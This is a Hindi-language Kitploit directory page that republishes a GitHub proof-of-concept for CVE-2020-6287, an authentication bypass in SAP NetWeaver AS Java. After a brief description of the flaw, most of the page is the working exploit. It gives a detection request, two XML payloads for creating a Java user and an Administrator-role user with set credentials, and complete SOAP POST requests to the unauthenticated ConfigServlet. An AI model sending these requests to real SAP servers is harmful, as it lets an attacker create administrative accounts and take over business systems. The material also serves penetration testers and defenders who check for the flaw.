Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-6287 — [CVE-2020-6287] SAP NetWeaver AS JAVA (LM कॉन्फ़िगरेशन विज़ार्ड) प्रमाणीकरण बायपास (सरल और व्यवस्थापक Java उपयोगकर्ता बनाएं) | Kitploit
उपकरण/GitHubGitHub/murataydemir/cve-2020-6287
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmurataydemir/cve-2020-6287

CVE-2020-6287

[CVE-2020-6287] SAP NetWeaver AS JAVA (LM कॉन्फ़िगरेशन विज़ार्ड) प्रमाणीकरण बायपास (सरल और व्यवस्थापक Java उपयोगकर्ता बनाएं)

रिपॉजिटरी देखें
13315 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

[CVE-2020-6287] SAP NetWeaver AS JAVA (LM Configuration Wizard) प्रमाणीकरण बाइपास (सरल एवं प्रशासक Java उपयोगकर्ता बनाएँ)


SAP NetWeaver SAP का एकीकृत प्रौद्योगिकी प्लेटफ़ॉर्म है और SAP Business Suite के बाद से सभी SAP अनुप्रयोगों की तकनीकी नींव है। SAP NetWeaver एक सेवा-उन्मुख अनुप्रयोग और एकीकरण प्लेटफ़ॉर्म है जो SAP अनुप्रयोगों के लिए विकास और रनिंग वातावरण प्रदान करता है, और इसका उपयोग अन्य अनुप्रयोगों और प्रणालियों के साथ कस्टम विकास और एकीकरण के लिए भी किया जा सकता है। SAP NetWeaver AS JAVA (LM Configuration Wizard), संस्करण 7.30, 7.31, 7.40, 7.50, प्रमाणीकरण जाँच नहीं करता है, जिसके कारण पहले से प्रमाणित न होने वाला हमलावर बिना किसी प्रमाणीकरण के कॉन्फ़िगरेशन कार्य निष्पादित कर सकता है और SAP Java सिस्टम के विरुद्ध महत्वपूर्ण कार्रवाई कर सकता है, जिसमें प्रशासनिक उपयोगकर्ता बनाने की क्षमता शामिल है, और इस प्रकार सिस्टम की गोपनीयता, अखंडता और उपलब्धता से समझौता होता है, जिसके परिणामस्वरूप प्रमाणीकरण जाँच की कमी होती है।

  • CVE-2020-6287 की जाँच करने के लिए: GET /CTCWebService/CTCWebServiceBean?wsdl
  • सरल Java उपयोगकर्ता बनाने के लिए: Proof of Concept (PoC) 1 पर जाएँ
  • प्रशासक Java उपयोगकर्ता बनाने के लिए: Proof of Concept (PoC) 2
  • सुरक्षित प्रूफ ऑफ कॉन्सेप्ट के लिए: CVE-2020-6286 रिपॉजिटरी देखें

प्रूफ ऑफ कॉन्सेप्ट (PoC) 1: सरल Java उपयोगकर्ता बनाएँ

पेलोड

root@kitploit:~
<root>
    <user>
        <JavaOrABAP>java</JavaOrABAP>
        <username>pentestuser</username>
        <password>v3rystr0ngp@ssw0rd</password>
        <userType></userType>
    </user>
</root>

उपरोक्त पेलोड को Base64 में एनकोड करें और नीचे दिए गए अनुरोध के <BASE64_ENCODED_PAYLOAD_HERE> फ़ील्ड में डालें

root@kitploit:~
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
    <soapenv:Header />
    <soapenv:Body>
        <urn:executeSynchronious>
            <identifier>
                <component>sap.com/tc~lm~config~content</component>
                <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
            </identifier>
            <contextMessages>
                <baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
                <name>userDetails</name>
            </contextMessages>
        </urn:executeSynchronious>
    </soapenv:Body>
</soapenv:Envelope>

प्रूफ ऑफ कॉन्सेप्ट (PoC) 2: प्रशासक Java उपयोगकर्ता बनाएँ

पेलोड

root@kitploit:~
<PCK>
    <Usermanagement>
        <SAP_XI_PCK_CONFIG>
            <roleName>Administrator</roleName>
        </SAP_XI_PCK_CONFIG>
        <SAP_XI_PCK_COMMUNICATION>
            <roleName>ThisIsRnd9326</roleName>
        </SAP_XI_PCK_COMMUNICATION>
        <SAP_XI_PCK_MONITOR>
            <roleName>ThisIsRnd5031</roleName>
        </SAP_XI_PCK_MONITOR>
        <SAP_XI_PCK_ADMIN>
            <roleName>ThisIsRnd9846</roleName>
        </SAP_XI_PCK_ADMIN>
        <PCKUser>
            <userName secure="true">pentestuser</userName>
            <password secure="true">v3rystr0ngp@ssw0rd</password>
        </PCKUser>
        <PCKReceiver>
            <userName>ThisIsRnd6461</userName>
            <password secure="true">ThisIsRnd5525</password>
        </PCKReceiver>
        <PCKMonitor>
            <userName>ThisIsRnd9457</userName>
            <password secure="true">ThisIsRnd9037</password>
        </PCKMonitor>
        <PCKAdmin>
            <userName>ThisIsRnd8386</userName>
            <password secure="true">ThisIsRnd8477</password>
        </PCKAdmin>
    </Usermanagement>
</PCK>

उपरोक्त पेलोड को Base64 में एनकोड करें और नीचे दिए गए अनुरोध के <BASE64_ENCODED_PAYLOAD_HERE> फ़ील्ड में डालें

root@kitploit:~
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
    <soapenv:Header />
    <soapenv:Body>
        <urn:executeSynchronious>
            <identifier>
                <component>sap.com/tc~lm~config~content</component>
                <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
            </identifier>
            <contextMessages>
                <baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
                <name>userDetails</name>
            </contextMessages>
        </urn:executeSynchronious>
    </soapenv:Body>
</soapenv:Envelope>
टूल डाउनलोड करें